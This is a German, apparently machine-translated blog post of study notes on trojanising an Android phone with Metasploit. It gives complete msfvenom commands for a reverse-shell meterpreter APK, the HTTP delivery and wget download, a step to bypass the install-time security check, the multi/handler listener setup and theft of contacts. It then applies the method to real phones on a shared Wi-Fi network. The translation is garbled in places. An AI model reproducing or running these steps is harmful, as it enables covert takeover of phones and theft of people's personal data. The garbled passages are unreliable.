Meine MSF-Studiennotizen zum Eindringen von Android-Trojanern

Haftungsausschluss: Der folgende Inhalt dient nur als Lernreferenz. Wenn Sie ihn auf illegale Weise verwenden, sind Sie für die Folgen verantwortlich. Ich hoffe, dass jeder ein guter Bürger ist, der sich an die Gesetze hält und gemeinsam die Netzwerksicherheit des Landes schützt! ! !

Umweltvorbereitung

Angriffsflugzeug: Kali

Zielmaschine: Android

1. Einbruchsoperation

1. Herstellung von Trojanischen Pferden

Indem man msfvenomeinen Android-Trojaner erstellt

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk

2. Öffnen Sie den HTTP-Dienst

Geben Sie im Terminal kaliden folgenden Befehl ein , um den http-Dienst zu starten

python3 -m http.server 80

3. Der Zielcomputer lädt das Trojanische Pferd herunter

Aufgrund des Fehlers der virtuellen Android-Maschine können wir den entsprechenden Befehl nicht im Browser der Zielmaschine eingeben, ipum den Trojaner herunterzuladen, sondern müssen den Befehl im Terminal eingeben, um den Trojaner herunterzuladen:

Terminal-Download-Befehl:

wget 10.9.136.152/android_yuanboss.apk

Bitte fügen Sie eine Bildbeschreibung hinzu

Es wurde jedoch festgestellt, dass der Download fehlgeschlagen ist, da das aktuelle Verzeichnis von Android ein schreibgeschütztes Dateisystem ist. Wenn wir etwas herunterladen müssen, müssen wir es in das SD-Kartenverzeichnis herunterladen:

cd sdcard
wget 10.9.136.152/android_yuanboss.apk

Wie in der Abbildung gezeigt, bedeutet dies, dass der Download erfolgreich war:

Bitte fügen Sie eine Bildbeschreibung hinzu

4. Installieren Sie den Trojaner

Nach dem Öffnen der Datei in Android, wie in der Abbildung gezeigt:

Bitte fügen Sie eine Bildbeschreibung hinzu

Das letzte ist das Trojanische Pferd, das wir heruntergeladen haben. Wir können es auf dumme Weise direkt installieren und darauf achten, die Sicherheitsüberprüfung während des Installationsvorgangs abzubrechen.

Nach der Installation sehen Sie auf dem Desktop folgendes Symbol:

Bitte fügen Sie eine Bildbeschreibung hinzu

5. Überwachungskonfiguration

1. Wählen Sie das Backdoor-Modul aus ( Sie müssen das Modul in diesem Schritt auswählen, sonst können Sie nicht mit den folgenden Schritten fortfahren ).

use exploit/multi/handler 

2. Legen Sie die Angriffslast fest payload(identisch mit der Last für die Erstellung eines Trojanischen Pferdes).

set payload android/meterpreter/reverse_tcp 

3. Legen Sie die Angriffsebene fest ip(wie beim Erstellen des Trojanischen Pferdes ip).

 set lhost 10.9.136.152

4. Stellen Sie den Port des angreifenden Computers ein port(derselbe wie der Port beim Erstellen des Trojanischen Pferdes).

set lport 4444

Die obige Überwachungskonfiguration ist in der Abbildung dargestellt:

Bitte fügen Sie eine Bildbeschreibung hinzu

6. Starten Sie die Überwachung

run

wie das Bild zeigt:

Bitte fügen Sie eine Bildbeschreibung hinzu

7. Trojanisches Pferd online

Öffnen Sie das Trojaner-Programm auf dem Zielcomputer

8. Die Überwachung ist erfolgreich

Bitte fügen Sie eine Bildbeschreibung hinzu

2. Penetrationsvorgang

1. Erhalten Sie Telefonkontakte

Fügen Sie zunächst Informationen zum Adressbuch auf dem Zielcomputer hinzu, führen Sie dann das Trojaner-Programm aus und kaliführen Sie dann den folgenden Befehl auf dem Zielcomputer aus:

dump_contacts 

Bitte fügen Sie eine Bildbeschreibung hinzu

Anhand des Protokolls können wir erkennen, dass die Adressbuchinformationen in contacts_dump_20230607062727.txtder Datei im aktuellen Verzeichnis gespeichert sind

catAls nächstes sehen Sie sich die Datei mit dem folgenden Befehl an:

Bitte fügen Sie eine Bildbeschreibung hinzu

Wir können sehen, dass die Adressbuchinformationen erfolgreich abgerufen wurden

3. Tatsächlicher Kampf gegen die Einpflanzung von Trojanern in Mobiltelefone

Die praktische Logik ist dieselbe wie im obigen Inhalt. Solange Sie sicherstellen, dass eine kaliVerbindung zum Mobiltelefon hergestellt werden kann ip, können Sie die Implantation eines Trojaners implementieren.

Die Schwierigkeit liegt also darin, wie wir eine Verbindung kalizum Mobiltelefon herstellen. kaliDer Vorgang zum Herstellen einer Verbindung mit dem Android-Telefon ist wie folgt:

Wie in der folgenden Abbildung gezeigt, müssen wir nur sicherstellen, dass unser Computer und unser Android-Telefon mit demselben WLAN-Router verbunden sind. Um sicherzustellen, dass sich Kali in der physischen Maschine im selben Netzwerksegment wie das Android-Telefon befinden kann, benötigen wir um es in den Bridge-Modus zu versetzen und im virtuellen kaliNetzwerk im Editor die Bridge-Netzwerkkarte als drahtlose Netzwerkkarte festzulegen. Der Name der drahtlosen Netzwerkkarte kann im Batch-Fenster der physischen Maschine angezeigt werden. Die Beschreibung ipconfig /allder WLAN-Adapter WLAN ist der Name der WLAN-Karte. Überprüfen Sie nach der Konfiguration der virtuellen Maschine kalidie IP-Adresse des Android-Telefons. Sie können feststellen, dass es sich im selben Netzwerksegment befindet, und Sie können das Android-Telefon über Kali anpingen ip.

Bitte fügen Sie eine Bildbeschreibung hinzu

Nachdem Sie sichergestellt haben kali, dass die Verbindung zu Android erfolgreich hergestellt wurde, führen Sie die oben genannten Einbruchs- und Penetrationsvorgänge aus!

Viertens. Zusammenfassung

Android-Intrusion ist dasselbe wie Windows, Sie müssen lediglich sicherstellen, dass das Netzwerk zwischen dem angreifenden Computer und dem Zielcomputer verbunden werden kann, um Durchdringung und Auslastung zu erreichen.

Beachten Sie, dass Android-Dateien nur Leseberechtigungen haben. Zum Herunterladen von Dateien müssen wir in das SD-Kartenverzeichnis wechseln

Der Befehl zum Herunterladen der Datei lautet:

wget ip/文件名
例如: weget 10.9.136.152/android_yuanboss.apk

Führen Sie den oben genannten Einbruchs- und Penetrationsvorgang aus!

おすすめ

転載: blog.csdn.net/weixin_46367450/article/details/131090921